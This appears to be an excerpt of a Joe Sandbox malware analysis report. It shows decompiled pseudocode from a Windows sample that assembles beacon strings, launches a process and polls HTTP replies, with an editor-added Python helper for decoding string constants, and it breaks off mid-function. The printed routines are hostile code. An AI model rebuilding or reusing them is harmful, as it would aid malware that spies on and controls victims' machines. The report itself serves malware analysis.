                      • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                      • Instruction ID: 8106919a96ef32ebeed079df81ebcaef54e9c301d36625b4043c8f4df4ea0052
                      • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                      • Instruction Fuzzy Hash: E621A7729002049BCB10EF68C8C09EBBBA6FF44360B49C1D8E9599B245E730F916CBE0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 76%
                      			E02BD2B91(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
                      				intOrPtr _v4;
                      				signed int _v8;
                      				int* _v12;
                      				char* _v16;
                      				intOrPtr _v20;
                      				void* _v24;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				void* _v40;
                      				void* __ebx;
                      				void* __edi;
                      				long _t68;
                      				intOrPtr _t69;
                      				intOrPtr _t70;
                      				intOrPtr _t71;
                      				intOrPtr _t72;
                      				intOrPtr _t73;
                      				void* _t76;
                      				intOrPtr _t77;
                      				int _t80;
                      				intOrPtr _t81;
                      				intOrPtr _t85;
                      				intOrPtr _t86;
                      				intOrPtr _t87;
                      				void* _t89;
                      				void* _t92;
                      				intOrPtr _t96;
                      				intOrPtr _t100;
                      				intOrPtr* _t102;
                      				int* _t108;
                      				int* _t118;
                      				char** _t120;
                      				char* _t121;
                      				intOrPtr* _t126;
                      				intOrPtr* _t128;
                      				intOrPtr* _t130;
                      				intOrPtr* _t132;
                      				intOrPtr _t135;
                      				intOrPtr _t139;
                      				int _t142;
                      				intOrPtr _t144;
                      				int _t147;
                      				intOrPtr _t148;
                      				int _t151;
                      				void* _t152;
                      				intOrPtr _t166;
                      				void* _t168;
                      				int _t169;
                      				void* _t170;
                      				void* _t171;
                      				long _t172;
                      				intOrPtr* _t173;
                      				intOrPtr* _t174;
                      				intOrPtr _t175;
                      				intOrPtr* _t178;
                      				char** _t181;
                      				char** _t183;
                      				char** _t184;
                      				void* _t189;
                      
                      				_t68 = __eax;
                      				_t181 =  &_v16;
                      				_t152 = _a20;
                      				_a20 = 8;
                      				if(__eax == 0) {
                      					_t68 = GetTickCount();
                      				}
                      				_t69 =  *0x2bda018; // 0x3dd6b064
                      				asm("bswap eax");
                      				_t70 =  *0x2bda014; // 0x3a87c8cd
                      				asm("bswap eax");
                      				_t71 =  *0x2bda010; // 0xd8d2f808
                      				asm("bswap eax");
                      				_t72 =  *0x2bda00c; // 0x81762942
                      				asm("bswap eax");
                      				_t73 =  *0x2bda348; // 0x9dd5a8
                      				_t3 = _t73 + 0x2bdb5ac; // 0x74666f73
                      				_t169 = wsprintfA(_t152, _t3, 3, 0x3d18f, _t72, _t71, _t70, _t69,  *0x2bda02c,  *0x2bda004, _t68);
                      				_t76 = E02BD467F();
                      				_t77 =  *0x2bda348; // 0x9dd5a8
                      				_t4 = _t77 + 0x2bdb575; // 0x74707526
                      				_t80 = wsprintfA(_t169 + _t152, _t4, _t76);
                      				_t183 =  &(_t181[0xe]);
                      				_t170 = _t169 + _t80;
                      				if(_a24 != 0) {
                      					_t148 =  *0x2bda348; // 0x9dd5a8
                      					_t8 = _t148 + 0x2bdb508; // 0x732526
                      					_t151 = wsprintfA(_t170 + _t152, _t8, _a24);
                      					_t183 =  &(_t183[3]);
                      					_t170 = _t170 + _t151;
                      				}
                      				_t81 =  *0x2bda348; // 0x9dd5a8
                      				_t10 = _t81 + 0x2bdb89e; // 0x35b8e46
                      				_t153 = _t10;
                      				_t189 = _a20 - _t10;
                      				_t12 = _t81 + 0x2bdb246; // 0x74636126
                      				_t164 = 0 | _t189 == 0x00000000;
                      				_t171 = _t170 + wsprintfA(_t170 + _t152, _t12, _t189 == 0);
                      				_t85 =  *0x2bda36c; // 0x35b95b0
                      				_t184 =  &(_t183[3]);
                      				if(_t85 != 0) {
                      					_t144 =  *0x2bda348; // 0x9dd5a8
                      					_t16 = _t144 + 0x2bdb8be; // 0x3d736f26
                      					_t147 = wsprintfA(_t171 + _t152, _t16, _t85);
                      					_t184 =  &(_t184[3]);
                      					_t171 = _t171 + _t147;
                      				}
                      				_t86 = E02BD472F(_t153);
                      				_a32 = _t86;
                      				if(_t86 != 0) {
                      					_t139 =  *0x2bda348; // 0x9dd5a8
                      					_t19 = _t139 + 0x2bdb8d0; // 0x736e6426
                      					_t142 = wsprintfA(_t171 + _t152, _t19, _t86);
                      					_t184 =  &(_t184[3]);
                      					_t171 = _t171 + _t142;
                      					HeapFree( *0x2bda2d8, 0, _a40);
                      				}
                      				_t87 = E02BD1340();
                      				_a32 = _t87;
                      				if(_t87 != 0) {
                      					_t135 =  *0x2bda348; // 0x9dd5a8
                      					_t23 = _t135 + 0x2bdb8c5; // 0x6f687726
                      					wsprintfA(_t171 + _t152, _t23, _t87);
                      					_t184 =  &(_t184[3]);
                      					HeapFree( *0x2bda2d8, 0, _a40);
                      				}
                      				_t166 =  *0x2bda3cc; // 0x35b9600
                      				_t89 = E02BD6B59(0x2bda00a, _t166 + 4);
                      				_t172 = 0;
                      				_a16 = _t89;
                      				if(_t89 == 0) {
                      					L30:
                      					HeapFree( *0x2bda2d8, _t172, _t152);
                      					return _a44;
                      				} else {
                      					_t92 = RtlAllocateHeap( *0x2bda2d8, 0, 0x800);
                      					_a24 = _t92;
                      					if(_t92 == 0) {
                      						L29:
                      						HeapFree( *0x2bda2d8, _t172, _a8);
                      						goto L30;
                      					}
                      					E02BD2915(GetTickCount());
                      					_t96 =  *0x2bda3cc; // 0x35b9600
                      					__imp__(_t96 + 0x40);
                      					asm("lock xadd [eax], ecx");
                      					_t100 =  *0x2bda3cc; // 0x35b9600
                      					__imp__(_t100 + 0x40);
                      					_t102 =  *0x2bda3cc; // 0x35b9600
                      					_t168 = E02BD6675(1, _t164, _t152,  *_t102);
                      					asm("lock xadd [eax], ecx");
                      					if(_t168 == 0) {
                      						L28:
                      						HeapFree( *0x2bda2d8, _t172, _a16);
                      						goto L29;
                      					}
                      					StrTrimA(_t168, 0x2bd9280);
                      					_push(_t168);
                      					_t108 = E02BD7563();
                      					_v12 = _t108;
                      					if(_t108 == 0) {
                      						L27:
                      						HeapFree( *0x2bda2d8, _t172, _t168);
                      						goto L28;
                      					}
                      					_t173 = __imp__;
                      					 *_t173(_t168, _a8);
                      					 *_t173(_a4, _v12);
                      					_t174 = __imp__;
                      					 *_t174(_v4, _v24);
                      					_t175 = E02BD6536( *_t174(_v12, _t168), _v20);
                      					_v36 = _t175;
                      					if(_t175 == 0) {
                      						_v8 = 8;
                      						L25:
                      						E02BD63F6();
                      						L26:
                      						HeapFree( *0x2bda2d8, 0, _v40);
                      						_t172 = 0;
                      						goto L27;
                      					}
                      					_t118 = E02BD6F7D(_t152, 0xffffffffffffffff, _t168,  &_v24);
                      					_v12 = _t118;
                      					if(_t118 == 0) {
                      						_t178 = _v24;
                      						_v20 = E02BD597D(_t178, _t175, _v16, _v12);
                      						_t126 =  *((intOrPtr*)(_t178 + 8));
                      						 *((intOrPtr*)( *_t126 + 0x80))(_t126);
                      						_t128 =  *((intOrPtr*)(_t178 + 8));
                      						 *((intOrPtr*)( *_t128 + 8))(_t128);
                      						_t130 =  *((intOrPtr*)(_t178 + 4));
                      						 *((intOrPtr*)( *_t130 + 8))(_t130);
                      						_t132 =  *_t178;
                      						 *((intOrPtr*)( *_t132 + 8))(_t132);
                      						E02BD61DA(_t178);
                      					}
                      					if(_v8 != 0x10d2) {
                      						L20:
                      						if(_v8 == 0) {
                      							_t120 = _v16;
                      							if(_t120 != 0) {
                      								_t121 =  *_t120;
                      								_t176 =  *_v12;
                      								_v16 = _t121;
                      								wcstombs(_t121, _t121,  *_v12);
                      								 *_v24 = E02BD673A(_v16, _v16, _t176 >> 1);
                      							}
                      						}
                      						goto L23;
                      					} else {
                      						if(_v16 != 0) {
                      							L23:
                      							E02BD61DA(_v32);
                      							if(_v12 == 0 || _v8 == 0x10d2) {
                      								goto L26;
                      							} else {
                      								goto L25;
                      							}
                      						}
                      						_v8 = _v8 & 0x00000000;
                      						goto L20;
                      					}
                      				}
                      			}

                      APIs
                      • GetTickCount.KERNEL32 ref: 02BD2BA8
                      • wsprintfA.USER32 ref: 02BD2BF5
                      • wsprintfA.USER32 ref: 02BD2C12
                      • wsprintfA.USER32 ref: 02BD2C34
                      • wsprintfA.USER32 ref: 02BD2C5B
                      • wsprintfA.USER32 ref: 02BD2C7C
                      • wsprintfA.USER32 ref: 02BD2CA7
                      • HeapFree.KERNEL32(00000000,?), ref: 02BD2CBA
                      • wsprintfA.USER32 ref: 02BD2CD9
                      • HeapFree.KERNEL32(00000000,?), ref: 02BD2CEA
                        • Part of subcall function 02BD6B59: RtlEnterCriticalSection.NTDLL(035B95C0), ref: 02BD6B75
                        • Part of subcall function 02BD6B59: RtlLeaveCriticalSection.NTDLL(035B95C0), ref: 02BD6B93
                      • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02BD2D19
                      • GetTickCount.KERNEL32 ref: 02BD2D2B
                      • RtlEnterCriticalSection.NTDLL(035B95C0), ref: 02BD2D3F
                      • RtlLeaveCriticalSection.NTDLL(035B95C0), ref: 02BD2D5D
                        • Part of subcall function 02BD6675: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,775EC740,02BD3ECE,00000000,035B9600), ref: 02BD66A0
                        • Part of subcall function 02BD6675: lstrlen.KERNEL32(00000000,?,775EC740,02BD3ECE,00000000,035B9600), ref: 02BD66A8
                        • Part of subcall function 02BD6675: strcpy.NTDLL ref: 02BD66BF
                        • Part of subcall function 02BD6675: lstrcat.KERNEL32(00000000,00000000), ref: 02BD66CA
                        • Part of subcall function 02BD6675: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,02BD3ECE,?,775EC740,02BD3ECE,00000000,035B9600), ref: 02BD66E7
                      • StrTrimA.SHLWAPI(00000000,02BD9280,?,035B9600), ref: 02BD2D8F
                        • Part of subcall function 02BD7563: lstrlen.KERNEL32(035B9C38,00000000,00000000,00000000,02BD3EF9,00000000), ref: 02BD7573
                        • Part of subcall function 02BD7563: lstrlen.KERNEL32(?), ref: 02BD757B
                        • Part of subcall function 02BD7563: lstrcpy.KERNEL32(00000000,035B9C38), ref: 02BD758F
                        • Part of subcall function 02BD7563: lstrcat.KERNEL32(00000000,?), ref: 02BD759A
                      • lstrcpy.KERNEL32(00000000,?), ref: 02BD2DB2
                      • lstrcpy.KERNEL32(?,?), ref: 02BD2DBC
                      • lstrcat.KERNEL32(?,?), ref: 02BD2DCC
                      • lstrcat.KERNEL32(?,00000000), ref: 02BD2DD3
                        • Part of subcall function 02BD6536: lstrlen.KERNEL32(?,00000000,035B9E40,00000000,02BD6F0A,035BA063,43175AC3,?,?,?,?,43175AC3,00000005,02BDA00C,4D283A53,?), ref: 02BD653D
                        • Part of subcall function 02BD6536: mbstowcs.NTDLL ref: 02BD6566
                        • Part of subcall function 02BD6536: memset.NTDLL ref: 02BD6578
                      • wcstombs.NTDLL ref: 02BD2E76
                        • Part of subcall function 02BD597D: SysAllocString.OLEAUT32(?), ref: 02BD59B8
                        • Part of subcall function 02BD61DA: RtlFreeHeap.NTDLL(00000000,00000000,02BD6383,00000000,?,00000000,00000000), ref: 02BD61E6
                      • HeapFree.KERNEL32(00000000,?), ref: 02BD2EBF
                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02BD2ECB
                      • HeapFree.KERNEL32(00000000,?,?,035B9600), ref: 02BD2ED8
                      • HeapFree.KERNEL32(00000000,?), ref: 02BD2EE5
                      • HeapFree.KERNEL32(00000000,?), ref: 02BD2EEF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: Heap$Free$wsprintf$lstrlen$CriticalSectionlstrcat$lstrcpy$CountEnterLeaveTickTrim$AllocAllocateStringmbstowcsmemsetstrcpywcstombs
                      • String ID: Uqt
                      • API String ID: 1185349883-2320327147
                      • Opcode ID: cafd58e92d7cabb135df012d71050afffa343ebf7faaf9dbdeaeac1bdc2f8019
                      • Instruction ID: 1ea5cdd7418d4842e1f0c10f17f28cce22e90372a1c0152898019e847790b90e
                      • Opcode Fuzzy Hash: cafd58e92d7cabb135df012d71050afffa343ebf7faaf9dbdeaeac1bdc2f8019
                      • Instruction Fuzzy Hash: 98A19C71902210AFCB11EF64DC54EDA7BE9EF88798F450968F888D3221E732D965CF61
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 73%
                      			E02BD37DF(void* __eax, void* __ecx) {
                      				long _v8;
                      				char _v12;
                      				void* _v16;
                      				void* _v28;
                      				long _v32;
                      				void _v104;
                      				char _v108;
                      				long _t36;
                      				intOrPtr _t40;
                      				intOrPtr _t47;
                      				intOrPtr _t50;
                      				void* _t58;
                      				void* _t68;
                      				intOrPtr* _t70;
                      				intOrPtr* _t71;
                      
                      				_t1 = __eax + 0x14; // 0x74183966
                      				_t69 =  *_t1;
                      				_t36 = E02BD6BF9(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                      				_v8 = _t36;
                      				if(_t36 != 0) {
                      					L12:
                      					return _v8;
                      				}
                      				E02BD7AB0( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                      				_t40 = _v12(_v12);
                      				_v8 = _t40;
                      				if(_t40 == 0 && ( *0x2bda300 & 0x00000001) != 0) {
                      					_v32 = 0;
                      					asm("stosd");
                      					asm("stosd");
                      					asm("stosd");
                      					_v108 = 0;
                      					memset( &_v104, 0, 0x40);
                      					_t47 =  *0x2bda348; // 0x9dd5a8
                      					_t18 = _t47 + 0x2bdb706; // 0x73797325
                      					_t68 = E02BD127E(_t18);
                      					if(_t68 == 0) {
                      						_v8 = 8;
                      					} else {
                      						_t50 =  *0x2bda348; // 0x9dd5a8
                      						_t19 = _t50 + 0x2bdb86c; // 0x35b8e14
                      						_t20 = _t50 + 0x2bdb3f6; // 0x4e52454b
                      						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                      						if(_t71 == 0) {
                      							_v8 = 0x7f;
                      						} else {
                      							_v108 = 0x44;
                      							E02BD5B56();
                      							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                      							_push(1);
                      							E02BD5B56();
                      							if(_t58 == 0) {
                      								_v8 = GetLastError();
                      							} else {
                      								CloseHandle(_v28);
                      								CloseHandle(_v32);
                      							}
                      						}
                      						HeapFree( *0x2bda2d8, 0, _t68);
                      					}
                      				}
                      				_t70 = _v16;
                      				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                      				E02BD61DA(_t70);
                      				goto L12;
                      			}
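
Triage note with an added helper (this is editor-written example code, not part of the Joe Sandbox report and not code from the sample). In the E02BD2B91 listing above, every `_tN = *0x2bda348 + offset` line carries a decompiler comment such as `// 0x74666f73`, and E02BD37DF carries `// 0x4e52454b` beside the GetModuleHandleA argument. Read as little-endian bytes these immediates are the first four characters of the strings handed to wsprintfA and GetModuleHandleA ("soft", "&upt", "&%s", "&act", "&os=", "&dns", "&who", "%sys", "KERN"); only those four bytes are on the page, the remainder of each string is not. The same decoding rejects values that are pointers or plain numbers (0x9dd5a8, 0x3d18f), which is what makes it usable on a whole listing. The second helper reproduces the `mov eax,[addr]; bswap eax` sequence over the four DWORDs at 0x2bda00c..0x2bda018 followed by a %08x-style hex print, which yields the bytes in memory order; that the format string prints them as %08x is an assumption, since the listing shows only its first four bytes.

```python
"""Added triage helper for decompiler listings such as E02BD2B91 / E02BD37DF.

Not part of the Joe Sandbox report or of the sample. It turns the 32-bit
immediates the decompiler leaves as comments (// 0x74666f73) back into the
bytes they are in memory, and reproduces the bswap-then-hex-print pattern.
"""
import struct
from typing import Dict, Iterable, Optional

# Immediates copied from the listings on this page (comments beside _tN = base + offset).
LISTING_CONSTANTS = [
    0x74666f73,  # E02BD2B91: first wsprintfA format string
    0x74707526,  # E02BD2B91: appended after E02BD467F()
    0x732526,    # E02BD2B91: appended when _a24 != 0
    0x74636126,  # E02BD2B91: appended with the _t189 == 0 flag
    0x3d736f26,  # E02BD2B91: appended when *0x2bda36c != 0
    0x736e6426,  # E02BD2B91: appended when E02BD472F() != 0
    0x6f687726,  # E02BD2B91: appended when E02BD1340() != 0
    0x73797325,  # E02BD37DF: argument to E02BD127E
    0x4e52454b,  # E02BD37DF: argument to GetModuleHandleA
    0x3d18f,     # E02BD2B91: numeric wsprintfA argument, not a string
    0x9dd5a8,    # E02BD2B91: runtime value of *0x2bda348, a base pointer, not a string
]


def le_dword_to_text(value: int) -> Optional[str]:
    """Return the 4 bytes of a little-endian DWORD as ASCII, or None.

    A trailing NUL is allowed (0x732526 is 26 25 73 00 in memory, i.e. "&%s");
    any other non-printable byte means the value is a number or a pointer,
    not the start of a string.
    """
    raw = struct.pack("<I", value & 0xFFFFFFFF).rstrip(b"\x00")
    if not raw or any(b < 0x20 or b > 0x7E for b in raw):
        return None
    return raw.decode("ascii")


def decode_listing_constants(values: Iterable[int]) -> Dict[str, Optional[str]]:
    """Map each immediate (as 0x-hex) to its string prefix, or None if it is not text."""
    return {f"0x{v:x}": le_dword_to_text(v) for v in values}


def bswap32(value: int) -> int:
    """The x86 `bswap eax` instruction: reverse the byte order of a 32-bit value."""
    return struct.unpack(">I", struct.pack("<I", value & 0xFFFFFFFF))[0]


def memory_order_hex(dwords: Iterable[int]) -> str:
    """Mimic `mov eax,[addr]; bswap eax` followed by a %08x print of each value.

    Because bswap undoes the little-endian load, the output is the hex of the
    bytes exactly as they lie in memory. The %08x width is an assumption; the
    page shows only the first four bytes ("soft") of the format string.
    """
    return "".join(f"{bswap32(d):08x}" for d in dwords)


if __name__ == "__main__":
    for key, text in decode_listing_constants(LISTING_CONSTANTS).items():
        print(f"{key:>12}  ->  {text!r}")
    # Runtime values the decompiler recorded at 0x2bda00c, 0x2bda010, 0x2bda014
    # and 0x2bda018, in the order E02BD2B91 passes them (_t72, _t71, _t70, _t69).
    print(memory_order_hex([0x81762942, 0xd8d2f808, 0x3a87c8cd, 0x3dd6b064]))
```

Running the script prints one line per immediate, with None for the pointer and numeric arguments, so the same routine can be pasted over any of the listings on this page to separate string references from the base-pointer arithmetic the decompiler did not resolve.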

                      APIs
                        • Part of subcall function 02BD6BF9: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02BD37FB,?,?,?,?,00000000,00000000), ref: 02BD6C1E
                        • Part of subcall function 02BD6BF9: GetProcAddress.KERNEL32(00000000,7243775A), ref: 02BD6C40
                        • Part of subcall function 02BD6BF9: GetProcAddress.KERNEL32(00000000,614D775A), ref: 02BD6C56
                        • Part of subcall function 02BD6BF9: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02BD6C6C
                        • Part of subcall function 02BD6BF9: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02BD6C82
                        • Part of subcall function 02BD6BF9: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02BD6C98
                      • memset.NTDLL ref: 02BD3849
                        • Part of subcall function 02BD127E: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,02BD3862,73797325), ref: 02BD128F
                        • Part of subcall function 02BD127E: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 02BD12A9
                      • GetModuleHandleA.KERNEL32(4E52454B,035B8E14,73797325), ref: 02BD387F
                      • GetProcAddress.KERNEL32(00000000), ref: 02BD3886
                      • HeapFree.KERNEL32(00000000,00000000), ref: 02BD38EE
                        • Part of subcall function 02BD5B56: GetProcAddress.KERNEL32(36776F57,02BD2425), ref: 02BD5B71
                      • CloseHandle.KERNEL32(00000000,00000001), ref: 02BD38CB
                      • CloseHandle.KERNEL32(?), ref: 02BD38D0
                      • GetLastError.KERNEL32(00000001), ref: 02BD38D4
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                      • String ID: Uqt$@MqtNqt
                      • API String ID: 3075724336-3266969629
                      • Opcode ID: ac218c005736fb0cb0ac22a3f8b224db9629e01f9dd9eb3d6d7546a2aa5e7f38
                      • Instruction ID: 6379d5b64781d9b3a8158c1907d0fd7585c793c3871665eca272d348ea44476c
                      • Opcode Fuzzy Hash: ac218c005736fb0cb0ac22a3f8b224db9629e01f9dd9eb3d6d7546a2aa5e7f38
                      • Instruction Fuzzy Hash: 6F313272D41208AFDB10AFA4DC84DDEBBBDEB04354F0144A5E606E3111E7326A54CF61
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E02BD3FA5(void* __ecx, void* __esi) {
                      				long _v8;
                      				long _v12;
                      				long _v16;
                      				long _v20;
                      				long _t34;
                      				long _t39;
                      				long _t42;
                      				long _t56;
                      				void* _t58;
                      				void* _t59;
                      				void* _t61;
                      
                      				_t61 = __esi;
                      				_t59 = __ecx;
                      				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                      				do {
                      					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                      					_v20 = _t34;
                      					if(_t34 != 0) {
                      						L3:
                      						_v8 = 4;
                      						_v16 = 0;
                      						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
                      							_t39 = GetLastError();
                      							_v12 = _t39;
                      							if(_v20 == 0 || _t39 != 0x2ef3) {
                      								L15:
                      								return _v12;
                      							} else {
                      								goto L11;
                      							}
                      						}
                      						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
                      							goto L11;
                      						} else {
                      							_v16 = 0;
                      							_v8 = 0;
                      							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
                      							_t58 = E02BD33DC(_v8 + 1);
                      							if(_t58 == 0) {
                      								_v12 = 8;
                      							} else {
                      								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
                      									E02BD61DA(_t58);
                      									_v12 = GetLastError();
                      								} else {
                      									 *((char*)(_t58 + _v8)) = 0;
                      									 *(_t61 + 0xc) = _t58;
                      								}
                      							}
                      							goto L15;
                      						}
                      					}
                      					SetEvent( *(_t61 + 0x1c));
                      					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                      					_v12 = _t56;
                      					if(_t56 != 0) {
                      						goto L15;
                      					}
                      					goto L3;
                      					L11:
                      					_t42 = E02BD16B2( *(_t61 + 0x1c), _t59, 0xea60);
                      					_v12 = _t42;
                      				} while (_t42 == 0);
                      				goto L15;
                      			}

                      APIs
                      • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,747581D0,00000000,00000000), ref: 02BD3FBC
                      • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,02BD3F34,00000000,?), ref: 02BD3FCC
                      • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 02BD3FFE
                      • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02BD4023
                      • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02BD4043
                      • GetLastError.KERNEL32 ref: 02BD4055
                        • Part of subcall function 02BD16B2: WaitForMultipleObjects.KERNEL32(00000002,02BD7C47,00000000,02BD7C47,?,?,?,02BD7C47,0000EA60), ref: 02BD16CD
                        • Part of subcall function 02BD61DA: RtlFreeHeap.NTDLL(00000000,00000000,02BD6383,00000000,?,00000000,00000000), ref: 02BD61E6
                      • GetLastError.KERNEL32(00000000), ref: 02BD408A
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                      • String ID: @MqtNqt
                      • API String ID: 3369646462-2883916605
                      • Opcode ID: 0fc7a39442a08f3192f21fee3716bb906f179f620d0c4ebb638ac18b02431607
                      • Instruction ID: ff26188ffa7575cb7f21947577abb057c010b6ce4b19988ef29d539fac7a426f
                      • Opcode Fuzzy Hash: 0fc7a39442a08f3192f21fee3716bb906f179f620d0c4ebb638ac18b02431607
                      • Instruction Fuzzy Hash: E6311CB5D00709EFDB20DFE5D8849DEBBB8EB08344F5449A9E502E2141E771AA44DF51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 43%
                      			E02BD7238(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				char _v20;
                      				intOrPtr _v24;
                      				signed int _v28;
                      				intOrPtr _v32;
                      				void* __edi;
                      				void* __esi;
                      				intOrPtr _t58;
                      				signed int _t60;
                      				signed int _t62;
                      				intOrPtr _t64;
                      				intOrPtr _t66;
                      				intOrPtr _t70;
                      				void* _t72;
                      				void* _t75;
                      				void* _t76;
                      				intOrPtr _t80;
                      				WCHAR* _t83;
                      				void* _t84;
                      				void* _t85;
                      				void* _t86;
                      				intOrPtr _t92;
                      				intOrPtr* _t102;
                      				signed int _t103;
                      				void* _t104;
                      				intOrPtr _t105;
                      				void* _t107;
                      				intOrPtr* _t115;
                      				void* _t119;
                      				intOrPtr _t125;
                      
                      				_t58 =  *0x2bda3dc; // 0x35b9ce8
                      				_v24 = _t58;
                      				_v28 = 8;
                      				_v20 = GetTickCount();
                      				_t60 = E02BD6ABD();
                      				_t103 = 5;
                      				_t98 = _t60 % _t103 + 6;
                      				_t62 = E02BD6ABD();
                      				_t117 = _t62 % _t103 + 6;
                      				_v32 = _t62 % _t103 + 6;
                      				_t64 = E02BD42E9(_t60 % _t103 + 6);
                      				_v16 = _t64;
                      				if(_t64 != 0) {
                      					_t66 = E02BD42E9(_t117);
                      					_v12 = _t66;
                      					if(_t66 != 0) {
                      						_push(5);
                      						_t104 = 0xa;
                      						_t119 = E02BD398D(_t104,  &_v20);
                      						if(_t119 == 0) {
                      							_t119 = 0x2bd918c;
                      						}
                      						_t70 = E02BD5FA1(_v24);
                      						_v8 = _t70;
                      						if(_t70 != 0) {
                      							_t115 = __imp__;
                      							_t72 =  *_t115(_t119);
                      							_t75 =  *_t115(_v8);
                      							_t76 =  *_t115(_a4);
                      							_t80 = E02BD33DC(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
                      							_v24 = _t80;
                      							if(_t80 != 0) {
                      								_t105 =  *0x2bda348; // 0x9dd5a8
                      								_t102 =  *0x2bda138; // 0x2bd7ddd
                      								_t28 = _t105 + 0x2bdbd10; // 0x530025
                      								 *_t102(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
                      								_push(4);
                      								_t107 = 5;
                      								_t83 = E02BD398D(_t107,  &_v20);
                      								_a8 = _t83;
                      								if(_t83 == 0) {
                      									_a8 = 0x2bd9190;
                      								}
                      								_t84 =  *_t115(_a8);
                      								_t85 =  *_t115(_v8);
                      								_t86 =  *_t115(_a4);
                      								_t125 = E02BD33DC(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
                      								if(_t125 == 0) {
                      									E02BD61DA(_v24);
                      								} else {
                      									_t92 =  *0x2bda348; // 0x9dd5a8
                      									_t44 = _t92 + 0x2bdba20; // 0x73006d
                      									 *_t102(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
                      									 *_a16 = _v24;
                      									_v28 = _v28 & 0x00000000;
                      									 *_a20 = _t125;
                      								}
                      							}
                      							E02BD61DA(_v8);
                      						}
